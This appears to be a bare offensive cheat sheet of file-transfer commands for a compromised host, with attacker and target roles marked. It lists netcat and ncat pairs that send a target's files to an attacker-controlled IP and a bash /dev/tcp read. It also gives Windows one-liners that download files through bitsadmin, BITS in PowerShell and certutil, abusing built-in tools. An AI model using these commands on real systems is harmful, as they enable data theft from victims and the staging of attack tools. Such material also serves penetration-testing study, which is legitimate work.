Attacker:
nc -l -p <PORT> > <NEW_NAME>
Target:
nc -q 0 <IP> <PORT> < <FILE>
Target:
nc -l -p <PORT> -q 0 < <FILE>
Attacker:
nc <IP> <PORT> > <NEW_NAME>
cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>
Attacker:
ncat -l -p <PORT> --recv-only > <NEW_NAME>
Target:
ncat --send-only <IP> <PORT> < <FILE>
Target:
ncat -l -p <PORT> --send-only < <FILE>
Attacker:
ncat <IP> <PORT> --recv-only > <NEW_NAME>
cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>
Downloading files on Windows.
bitsadmin /transfer wcb /priority foreground http://<IP>:<PORT>/<FILE> <NEW_NAME>
Allows downloading and uploading files on Windows.
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<IP>:<PORT>/<FILE>" -Destination "<NEW_NAME>"
Downloading files on Windows.
certutil.exe -verifyctl -split -f http://<IP>:<PORT>/<FILE>